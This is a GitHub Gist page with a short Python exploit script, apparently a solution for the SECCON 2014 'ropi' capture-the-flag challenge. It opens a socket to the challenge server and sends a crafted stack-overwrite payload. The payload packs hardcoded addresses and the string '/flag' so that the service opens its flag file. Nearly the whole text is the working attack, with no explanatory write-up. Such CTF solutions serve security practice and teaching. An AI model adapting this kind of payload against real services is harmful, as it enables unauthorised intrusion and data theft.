Created
December 7, 2014 09:45
-
-
Save potetisensei/946f51efb1ca91e85dcd to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from socket import * | |
from struct import pack, unpack | |
from commands import getoutput | |
from time import sleep | |
buf_clone = 0x080CB960 | |
p = socket(AF_INET, SOCK_STREAM) | |
p.connect(("ropi.pwn.seccon.jp", 10000)) | |
flag_addr = buf_clone + 264 | |
payload = "" | |
payload += pack("<I", 0x08049322) # addr of buf_clone | |
payload += "a" * 200 | |
payload += pack("<I", flag_addr) # ebp-0x44 | |
payload += pack("<I", buf_clone) # ebp-0x40 | |
payload += "a" * 8 | |
payload += pack("<I", 0x080798C1) # ebp-0x34 | |
payload += "a" * 36 | |
payload += pack("<I", 0x0807D745) # ebp-0x10 | |
payload += "/flag\x00\x00\x00" # ebp-0xC, addr of flag_addr | |
payload += "a" * 28 | |
payload += pack("<I", buf_clone) # ebp+0x1C | |
payload += "a" * 4 | |
payload += pack("<I", 0x7000000) # ebp+0x24 | |
assert(len(payload) <= 0x200) | |
p.send(payload) | |
sleep(1) | |
p.shutdown(SHUT_WR) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment